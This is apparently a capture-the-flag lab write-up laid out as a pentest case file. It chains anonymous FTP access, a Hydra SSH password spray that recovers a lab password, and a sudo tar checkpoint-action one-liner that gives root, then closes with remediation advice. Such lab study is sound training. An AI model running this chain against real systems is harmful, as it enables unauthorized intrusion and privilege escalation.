Anonymous FTP wordlist to SSH and sudo tar abuse
Linux host with anonymous FTP leaking a task note and password candidates; SSH spray as lin succeeded; misconfigured sudo for /bin/tar yielded root via GTFOBins checkpoint-action.
- Case files
- Anonymous FTP wordlist to SSH and sudo tar abuse
Anonymous FTP provided both a username (lin) and a password wordlist. Hydra recovered SSH access. sudo -l showed NOPASSWD-style rights on tar, which we converted into a root shell.
nmap identified FTP/SSH/HTTP. Anonymous FTP yielded task.txt and locks.txt.
Hydra with locks.txt recovered RedDr4gonSynd1cat3 for user lin.
sudo -l permitted /bin/tar as root. GTFOBins checkpoint-action spawned /bin/sh.
Engagement summary
Anonymous FTP provided both a username (lin) and a password wordlist. Hydra recovered SSH access. sudo -l showed NOPASSWD-style rights on tar, which we converted into a root shell.
Against 10.10.67.0 we found vsftpd with anonymous login, OpenSSH, and Apache. FTP offered locks.txt (password candidates) and task.txt (operator identity lin). Password spraying against SSH succeeded. Privilege escalation was a single misconfiguration: lin could run /bin/tar as root.
Business impact
Anonymous FTP turned into interactive SSH and then root. Disable anonymous FTP, never store password material on public shares, and audit sudoers for GTFOBins-capable binaries (tar, find, vim, etc.).
Recon and anonymous FTP loot
nmap identified FTP/SSH/HTTP. Anonymous FTP yielded task.txt and locks.txt.
OPERATOR · NMAP
savvy@lab:~$ nmap -sV 10.10.67.0 -Pn
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
OPERATOR · FTP
savvy@lab:~$ ftp 10.10.67.0
Name: Anonymous
230 Login successful.
ftp> get locks.txt
ftp> get task.txt
savvy@lab:~$ cat task.txt
1.) Protect Vicious.
2.) Plan for Red Eye pickup on the moon.
-lin
SSH spray with FTP wordlist
Hydra with locks.txt recovered RedDr4gonSynd1cat3 for user lin.
OPERATOR · HYDRA
savvy@lab:~$ hydra -l lin -P locks.txt ssh://10.10.67.0 -V
[22][ssh] host: 10.10.67.0 login: lin password: RedDr4gonSynd1cat3
savvy@lab:~$ ssh lin@10.10.67.0
savvy@lab:~/Desktop$
Privilege escalation via sudo tar
sudo -l permitted /bin/tar as root. GTFOBins checkpoint-action spawned /bin/sh.
OPERATOR · SUDO -L
savvy@lab:~/Desktop$ sudo -l
User lin may run the following commands on bountyhacker:
(root) /bin/tar
OPERATOR · GTFOBINS
savvy@lab:~$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
tar: Removing leading `/' from member names
# whoami
root
Remediation
Remove tar from sudoers. Prefer narrowly scoped scripts over raw binaries. Disable anonymous FTP and rotate any passwords that appeared in locks.txt.